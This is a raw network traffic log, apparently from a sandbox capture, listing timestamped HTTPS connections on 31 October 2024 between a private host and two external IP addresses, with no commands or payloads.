                                                  Oct 31, 2024 20:50:42.327735901 CET4435236913.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:42.329200983 CET52369443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:42.329402924 CET52369443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:42.329421043 CET4435236913.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:42.332663059 CET4435236713.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:42.333265066 CET52367443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:42.333276033 CET4435236713.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:42.334073067 CET52367443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:42.334078074 CET4435236713.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:42.354824066 CET4435236413.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:42.354863882 CET4435236413.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:42.355020046 CET52364443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:42.355318069 CET52364443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:42.355318069 CET52364443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:42.355353117 CET4435236413.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:42.355393887 CET4435236413.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:42.357727051 CET52370443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:42.357774019 CET4435237013.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:42.357901096 CET52370443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:42.358082056 CET52370443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:42.358098984 CET4435237013.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:42.452678919 CET4435236613.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:42.452944040 CET4435236613.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:42.453010082 CET52366443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:42.453114033 CET52366443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:42.453114033 CET52366443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:42.453155041 CET4435236613.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:42.453181982 CET4435236613.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:42.457134962 CET52371443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:42.457174063 CET4435237113.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:42.457251072 CET52371443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:42.457412004 CET52371443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:42.457429886 CET4435237113.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:42.471292973 CET4435236713.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:42.471369982 CET4435236713.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:42.471584082 CET52367443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:42.471832037 CET52367443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:42.471846104 CET4435236713.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:42.471868038 CET52367443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:42.471872091 CET4435236713.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:42.475467920 CET52372443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:42.475481987 CET4435237213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:42.475544930 CET52372443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:42.475809097 CET52372443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:42.475821018 CET4435237213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:42.509342909 CET4435236813.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:42.510035038 CET52368443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:42.510057926 CET4435236813.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:42.511303902 CET52368443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:42.511322021 CET4435236813.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:42.643553972 CET4435236813.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:42.643760920 CET4435236813.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:42.643814087 CET52368443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:42.643940926 CET52368443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:42.643963099 CET4435236813.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:42.648523092 CET52373443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:42.648577929 CET4435237313.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:42.648699999 CET52373443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:42.649313927 CET52373443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:42.649347067 CET4435237313.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:42.936996937 CET52374443192.168.2.4142.250.184.228
                                                  Oct 31, 2024 20:50:42.937045097 CET44352374142.250.184.228192.168.2.4
                                                  Oct 31, 2024 20:50:42.937268972 CET52374443192.168.2.4142.250.184.228
                                                  Oct 31, 2024 20:50:42.937589884 CET52374443192.168.2.4142.250.184.228
                                                  Oct 31, 2024 20:50:42.937604904 CET44352374142.250.184.228192.168.2.4
                                                  Oct 31, 2024 20:50:43.328975916 CET4435236913.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:43.329624891 CET52369443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:43.329649925 CET4435236913.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:43.330013990 CET4435237013.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:43.330086946 CET52369443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:43.330096006 CET4435236913.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:43.330377102 CET52370443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:43.330403090 CET4435237013.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:43.330817938 CET52370443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:43.330825090 CET4435237013.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:43.331595898 CET4435237113.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:43.332042933 CET52371443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:43.332062960 CET4435237113.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:43.332432032 CET52371443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:43.332437992 CET4435237113.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:43.461704016 CET4435237213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:43.462223053 CET52372443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:43.462251902 CET4435237213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:43.462692022 CET52372443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:43.462697029 CET4435237213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:43.462903023 CET4435237113.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:43.463119984 CET4435237113.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:43.463176966 CET52371443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:43.463221073 CET52371443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:43.463239908 CET4435237113.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:43.463252068 CET52371443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:43.463257074 CET4435237113.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:43.463275909 CET4435237313.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:43.463588953 CET52373443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:43.463654041 CET4435237313.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:43.463990927 CET52373443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:43.464004993 CET4435237313.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:43.464159966 CET4435236913.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:43.464692116 CET4435236913.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:43.464752913 CET52369443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:43.464855909 CET52369443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:43.464859962 CET4435236913.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:43.464876890 CET52369443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:43.464879036 CET4435236913.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:43.466027021 CET4435237013.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:43.466203928 CET4435237013.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:43.466260910 CET52370443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:43.466383934 CET52370443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:43.466383934 CET52370443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:43.466401100 CET4435237013.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:43.466409922 CET4435237013.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:43.467384100 CET52375443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:43.467454910 CET4435237513.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:43.467521906 CET52376443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:43.467545033 CET52375443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:43.467554092 CET4435237613.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:43.467608929 CET52376443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:43.467730045 CET52375443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:43.467755079 CET52376443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:43.467758894 CET4435237513.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:43.467767000 CET4435237613.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:43.468867064 CET52377443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:43.468897104 CET4435237713.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:43.469000101 CET52377443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:43.469129086 CET52377443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:43.469140053 CET4435237713.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:43.592864037 CET4435237313.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:43.592997074 CET4435237313.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:43.593060970 CET52373443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:43.593193054 CET52373443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:43.593225002 CET4435237313.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:43.593251944 CET52373443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:43.593269110 CET4435237313.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:43.596154928 CET52378443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:43.596191883 CET4435237813.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:43.596261024 CET52378443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:43.596451998 CET52378443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:43.596463919 CET4435237813.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:43.611253977 CET4435237213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:43.611339092 CET4435237213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:43.611406088 CET52372443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:43.611498117 CET52372443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:43.611507893 CET4435237213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:43.611525059 CET52372443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:43.611534119 CET4435237213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:43.613725901 CET52379443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:43.613754034 CET4435237913.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:43.613856077 CET52379443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:43.614016056 CET52379443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:43.614027977 CET4435237913.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:43.802090883 CET44352374142.250.184.228192.168.2.4
                                                  Oct 31, 2024 20:50:43.802814960 CET52374443192.168.2.4142.250.184.228
                                                  Oct 31, 2024 20:50:43.802834988 CET44352374142.250.184.228192.168.2.4
                                                  Oct 31, 2024 20:50:43.803179026 CET44352374142.250.184.228192.168.2.4
                                                  Oct 31, 2024 20:50:43.803976059 CET52374443192.168.2.4142.250.184.228
                                                  Oct 31, 2024 20:50:43.804044962 CET44352374142.250.184.228192.168.2.4
                                                  Oct 31, 2024 20:50:43.851888895 CET52374443192.168.2.4142.250.184.228
                                                  Oct 31, 2024 20:50:44.415096998 CET4435237513.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:44.415587902 CET4435237913.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:44.415668964 CET52375443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:44.415716887 CET4435237513.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:44.416446924 CET52375443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:44.416460037 CET4435237513.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:44.416465998 CET4435237613.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:44.416801929 CET52376443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:44.416815996 CET4435237613.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:44.417253017 CET4435237713.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:44.417788029 CET52376443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:44.417793036 CET4435237613.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:44.418283939 CET52379443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:44.418304920 CET4435237913.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:44.419063091 CET52379443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:44.419068098 CET4435237913.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:44.419619083 CET52377443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:44.419625044 CET4435237713.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:44.420178890 CET52377443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:44.420183897 CET4435237713.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:44.421277046 CET4435237813.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:44.422059059 CET52378443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:44.422066927 CET4435237813.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:44.422899008 CET52378443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:44.422904015 CET4435237813.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:44.545342922 CET4435237513.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:44.545506001 CET4435237513.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:44.545568943 CET52375443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:44.546098948 CET52375443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:44.546144962 CET4435237513.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:44.546173096 CET52375443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:44.546188116 CET4435237513.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:44.548234940 CET4435237613.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:44.548715115 CET4435237613.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:44.548882961 CET52376443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:44.549032927 CET52376443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:44.549051046 CET4435237613.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:44.549066067 CET52376443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:44.549072027 CET4435237613.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:44.552881956 CET4435237713.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:44.553316116 CET4435237713.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:44.553370953 CET52377443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:44.553668976 CET52380443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:44.553700924 CET4435238013.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:44.553823948 CET52380443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:44.554379940 CET52381443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:44.554409981 CET4435238113.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:44.554491997 CET52381443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:44.554795027 CET52377443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:44.554811001 CET4435237713.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:44.555617094 CET4435237913.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:44.555668116 CET4435237913.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:44.555787086 CET52379443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:44.557751894 CET4435237813.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:44.558640003 CET4435237813.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:44.558696985 CET52378443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:44.559091091 CET52382443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:44.559115887 CET4435238213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:44.559168100 CET52382443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:44.559505939 CET52382443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:44.559520006 CET4435238213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:44.559647083 CET52379443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:44.559652090 CET4435237913.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:44.559662104 CET52379443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:44.559672117 CET4435237913.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:44.559820890 CET52378443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:44.559827089 CET4435237813.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:44.562484026 CET52380443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:44.562496901 CET4435238013.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:44.562927961 CET52381443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:44.562947035 CET4435238113.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:44.567151070 CET52383443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:44.567166090 CET4435238313.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:44.567225933 CET52383443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:44.567590952 CET52383443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:44.567604065 CET4435238313.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:44.569399118 CET52384443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:44.569432020 CET4435238413.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:44.569777012 CET52384443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:44.569925070 CET52384443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:44.569942951 CET4435238413.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:45.304626942 CET4435238313.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:45.305742025 CET52383443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:45.305768013 CET4435238313.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:45.306617975 CET52383443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:45.306622982 CET4435238313.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:45.307492018 CET4435238413.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:45.308504105 CET52384443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:45.308523893 CET4435238413.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:45.309015036 CET52384443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:45.309025049 CET4435238413.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:45.324770927 CET4435238213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:45.325301886 CET52382443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:45.325319052 CET4435238213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:45.325808048 CET52382443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:45.325814009 CET4435238213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:45.327804089 CET4435238013.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:45.328330994 CET52380443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:45.328340054 CET4435238013.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:45.329015970 CET52380443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:45.329022884 CET4435238013.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:45.437864065 CET4435238313.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:45.437957048 CET4435238313.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:45.438116074 CET52383443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:45.438175917 CET52383443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:45.438195944 CET4435238313.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:45.438209057 CET52383443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:45.438215017 CET4435238313.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:45.438313961 CET4435238413.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:45.438925982 CET4435238413.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:45.438977003 CET52384443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:45.439084053 CET52384443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:45.439106941 CET4435238413.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:45.439122915 CET52384443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:45.439129114 CET4435238413.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:45.441298008 CET52385443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:45.441339016 CET4435238513.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:45.441406965 CET52385443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:45.441518068 CET52386443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:45.441540003 CET4435238613.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:45.441550970 CET52385443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:45.441567898 CET4435238513.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:45.441595078 CET52386443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:45.441694021 CET52386443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:45.441704988 CET4435238613.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:45.459872961 CET4435238213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:45.459955931 CET4435238213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:45.460011005 CET52382443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:45.460158110 CET52382443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:45.460158110 CET52382443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:45.460174084 CET4435238213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:45.460182905 CET4435238213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:45.462327003 CET52387443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:45.462354898 CET4435238713.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:45.462446928 CET52387443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:45.462611914 CET52387443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:45.462624073 CET4435238713.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:45.463493109 CET4435238013.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:45.463551998 CET4435238013.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:45.463659048 CET52380443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:45.463689089 CET52380443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:45.463694096 CET4435238013.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:45.463705063 CET52380443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:45.463710070 CET4435238013.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:45.465511084 CET52388443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:45.465542078 CET4435238813.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:45.465650082 CET52388443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:45.465821028 CET52388443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:45.465835094 CET4435238813.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:45.509891987 CET4435238113.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:45.510402918 CET52381443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:45.510438919 CET4435238113.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:45.510848999 CET52381443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:45.510854959 CET4435238113.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:45.641161919 CET4435238113.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:45.641302109 CET4435238113.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:45.641351938 CET52381443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:45.641465902 CET52381443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:45.641489029 CET4435238113.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:45.641500950 CET52381443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:45.641506910 CET4435238113.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:45.644001007 CET52389443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:45.644040108 CET4435238913.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:45.644136906 CET52389443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:45.644301891 CET52389443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:45.644314051 CET4435238913.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:46.178591967 CET4435238513.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:46.179085970 CET52385443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:46.179102898 CET4435238513.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:46.179537058 CET52385443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:46.179542065 CET4435238513.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:46.206547022 CET4435238713.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:46.206679106 CET4435238613.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:46.206964016 CET52387443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:46.206979990 CET4435238713.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:46.207194090 CET52386443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:46.207216978 CET4435238613.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:46.207542896 CET52387443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:46.207547903 CET4435238713.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:46.207582951 CET52386443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:46.207590103 CET4435238613.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:46.247596979 CET4435238813.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:46.248039961 CET52388443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:46.248063087 CET4435238813.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:46.248466015 CET52388443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:46.248475075 CET4435238813.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:46.308898926 CET4435238513.107.246.60192.168.2.4
